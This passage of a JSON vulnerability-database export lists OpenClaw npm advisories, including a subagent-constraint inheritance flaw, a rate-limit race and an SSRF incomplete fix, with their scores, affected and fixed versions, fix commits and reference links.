"scoring_elements": "0.1326", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13224", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13264", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41372" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41372", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41372" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery" }, { "reference_url": "https://github.com/advisories/GHSA-fh32-73r9-rgh5", "reference_id": "GHSA-fh32-73r9-rgh5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fh32-73r9-rgh5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41372", "GHSA-fh32-73r9-rgh5" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xfgw-ua7r-abbr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95118?format=api", "vulnerability_id": "VCID-xj73-kszs-yygp", "summary": "OpenClaw's ACP child sessions inherit subagent security envelope constraints\n## Summary\nACP child sessions inherit subagent security envelope constraints.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA restricted subagent spawning an ACP child session could fail to carry forward subagent-only constraints such as depth, child-count limits, control scope, or target-agent restrictions.\n\n## Fix\nACP spawn now resolves and persists child subagent envelope fields, enforces maximum depth and active-child caps, and applies the inherited control scope to child ACP sessions.\n\n## Fix Commit(s)\n- 31160dc069b7cc5d833b39c53736a41ad3befda2\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft, @qclawer, and @KeenSecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44997", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08411", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08403", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08423", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44997" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44997", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44997" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions" }, { "reference_url": "https://github.com/advisories/GHSA-q3jj-46pq-826r", "reference_id": "GHSA-q3jj-46pq-826r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q3jj-46pq-826r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "CVE-2026-44997", "GHSA-q3jj-46pq-826r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xj73-kszs-yygp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89086?format=api", "vulnerability_id": "VCID-xnvm-rp36-vyaj", "summary": "OpenClaw: Concurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths\n## Impact\n\nConcurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths.\n\nConcurrent asynchronous shared-secret auth attempts could race the per-key rate-limit budget.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.4`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Telecaster2147 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41913", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23421", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23468", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23481", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41913" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41913", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41913" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts" }, { "reference_url": "https://github.com/advisories/GHSA-25wv-8phj-8p7r", "reference_id": "GHSA-25wv-8phj-8p7r", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-25wv-8phj-8p7r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110113?format=api", "purl": "pkg:npm/openclaw@2026.4.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/110881?format=api", "purl": "pkg:npm/openclaw@2026.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-x1qe-u363-qqaa" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5" } ], "aliases": [ "CVE-2026-41913", "GHSA-25wv-8phj-8p7r" ], "risk_score": 2.9, "exploitability": "0.5", "weighted_severity": "5.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xnvm-rp36-vyaj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91330?format=api", "vulnerability_id": "VCID-xpr3-hg3h-z3bz", "summary": "OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n## Summary\n\nSSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSeveral channel extensions still used raw `fetch()` against configured base URLs without the SSRF guard that was added for CVE-2026-28476. Commit `f92c92515bd439a71bd03eb1bc969c1964f17acf` routes those outbound requests through `fetchWithSsrFGuard` so configured endpoints cannot be rebound to blocked internal destinations.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f92c92515bd439a71bd03eb1bc969c1964f17acf`.\n\n## Fix Commit(s)\n\n- `f92c92515bd439a71bd03eb1bc969c1964f17acf`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35629", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14495", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14536", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14532", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35629" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": 